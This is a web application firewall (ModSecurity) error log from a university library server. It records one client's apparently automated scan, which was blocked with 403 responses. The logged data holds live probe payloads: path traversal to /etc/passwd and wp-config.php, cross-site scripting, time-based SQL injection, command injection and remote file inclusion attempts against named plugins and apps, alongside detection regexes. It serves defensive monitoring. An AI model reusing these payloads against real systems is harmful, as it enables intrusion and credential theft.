[Tue Aug 29 11:42:54.438836 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:installation_path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:installation_path: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/qcubed/assets/php/_devtools/installer/step_2.php"] [unique_id "ZO13TsCo-f0AAAdV7ecAAAAa"]
[Tue Aug 29 11:42:57.405635 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:oldfile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:oldfile: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/dlibrary/null"] [unique_id "ZO13UcCo-f0AAAdOeTsAAAAS"]
[Tue Aug 29 11:42:59.507527 2023] [:error] [pid 1485] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wt3/forceSave.php"] [unique_id "ZO13U8Co-f0AAAXNuYEAAAAg"]
[Tue Aug 29 11:43:00.407887 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"admin"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22admin\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/send_order.cgi"] [unique_id "ZO13VMCo-f0AAAdTBC4AAAAY"]
[Tue Aug 29 11:43:00.426600 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0:8080/ found within TX:1: 0:8080/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/proxy"] [unique_id "ZO13VMCo-f0AAAQSW34AAAA0"]
[Tue Aug 29 11:43:00.479440 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))), found within ARGS:id: 1||(updatexml(1,concat(0x7e,(select md5(999999999))),1))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/delete_cart_goods.php"] [unique_id "ZO13VMCo-f0AAAcoNl4AAAAF"]
[Tue Aug 29 11:43:02.428537 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:zero. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ( found within ARGS:zero: <img src=x onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13VsCo-f0AAAc921cAAAAD"]
[Tue Aug 29 11:43:03.453116 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13V8Co-f0AAAdxUUIAAAAC"]
[Tue Aug 29 11:43:04.397855 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Object. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:Object: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO13WMCo-f0AAAcsLIgAAAAE"]
[Tue Aug 29 11:43:04.459549 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/mdc-youtube-downloader/includes/download.php"] [unique_id "ZO13WMCo-f0AAAdxUUgAAAAC"]
[Tue Aug 29 11:43:06.424268 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:style_name: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/pub/bscw.cgi/30"] [unique_id "ZO13WsCo-f0AAAdb7ngAAAAb"]
[Tue Aug 29 11:43:07.940978 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/servlet/taskProc"] [unique_id "ZO13W8Co-f0AAAd9UOwAAAAr"]
[Tue Aug 29 11:43:08.107331 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:lang: english|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/maint/modules/home/index.php"] [unique_id "ZO13XMCo-f0AAAdSZQAAAAAX"]
[Tue Aug 29 11:43:08.617536 2023] [:error] [pid 1968] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com found within TX:1: google.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilib.unla.ac.id"] [uri "/MicroStrategy/servlet/taskProc"] [unique_id "ZO13XMCo-f0AAAewCUgAAAAI"]
[Tue Aug 29 11:43:09.371341 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/themes/NativeChurch/download/download.php"] [unique_id "ZO13XcCo-f0AAAexH-EAAAAN"]
[Tue Aug 29 11:43:10.405275 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:download_file: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13XsCo-f0AAAeX1FAAAAAK"]
[Tue Aug 29 11:43:11.473554 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:abspath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:abspath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php"] [unique_id "ZO13X8Co-f0AAActbOsAAAAH"]
[Tue Aug 29 11:43:14.442980 2023] [:error] [pid 1943] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpv-image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:wpv-image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13YsCo-f0AAAeX1F4AAAAK"]
[Tue Aug 29 11:43:15.627391 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13Y8Co-f0AAAexIAIAAAAN"]
[Tue Aug 29 11:43:18.392275 2023] [:error] [pid 1917] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../LocalConfiguration.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php"] [unique_id "ZO13ZsCo-f0AAAd9UPoAAAAr"]
[Tue Aug 29 11:43:18.405473 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:file: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/document.php"] [unique_id "ZO13ZsCo-f0AAAc4EpoAAAAP"]
[Tue Aug 29 11:43:20.385101 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:cpath: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/fmangersub"] [unique_id "ZO13aMCo-f0AAAc4Ep8AAAAP"]
[Tue Aug 29 11:43:21.419454 2023] [:error] [pid 1973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../../ found within ARGS:file: /../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/admin/index.php"] [unique_id "ZO13acCo-f0AAAe1eeEAAAAB"]
[Tue Aug 29 11:43:21.506224 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13acCo-f0AAAc923EAAAAD"]
[Tue Aug 29 11:43:23.489617 2023] [:error] [pid 1969] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:OBJECT Socket;print "Content-Type: text/plain\\\\n\\\\n";$cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:OBJECT Socket;print \\x22Content-Type: text/plain\\x5c\\x5cn\\x5c\\x5cn\\x22;$cmd: `id` print $cmdnn "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/rpc.cgi"] [unique_id "ZO13a8Co-f0AAAexIBwAAAAN"]
[Tue Aug 29 11:43:25.399990 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:token: {{token}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO13bcCo-f0AAAdECgsAAAAW"]
[Tue Aug 29 11:43:27.627723 2023] [:error] [pid 1875] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id[1]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /**/ found within ARGS:id[1]: =(SELECT/**/1/**/WHERE/**/SLEEP(6))"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-json/notificationx/v1/notification/1"] [unique_id "ZO13b8Co-f0AAAdTBHgAAAAY"]
[Tue Aug 29 11:43:28.547770 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(0)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13cMCo-f0AAAe3964AAAAA"]
[Tue Aug 29 11:43:29.511824 2023] [:error] [pid 1985] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:date. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:date: 2022-05-24-6' AND (SELECT 7774 FROM (SELECT(SLEEP(10)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/admin/"] [unique_id "ZO13ccCo-f0AAAfBLycAAAAI"]
[Tue Aug 29 11:43:30.440685 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13csCo-f0AAAcvBqEAAAAJ"]
[Tue Aug 29 11:43:31.388647 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:locale. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:locale: ../../../../../../../lib/password.properties\\x00en"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/CFIDE/administrator/enter.cfm"] [unique_id "ZO13c8Co-f0AAAfEBtIAAAAO"]
[Tue Aug 29 11:43:36.369535 2023] [:error] [pid 1993] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13eMCo-f0AAAfJuecAAAAa"]
[Tue Aug 29 11:43:37.442252 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ebookdownloadurl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:ebookdownloadurl: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/ebook-download/filedownload.php"] [unique_id "ZO13ecCo-f0AAAdb7q4AAAAb"]
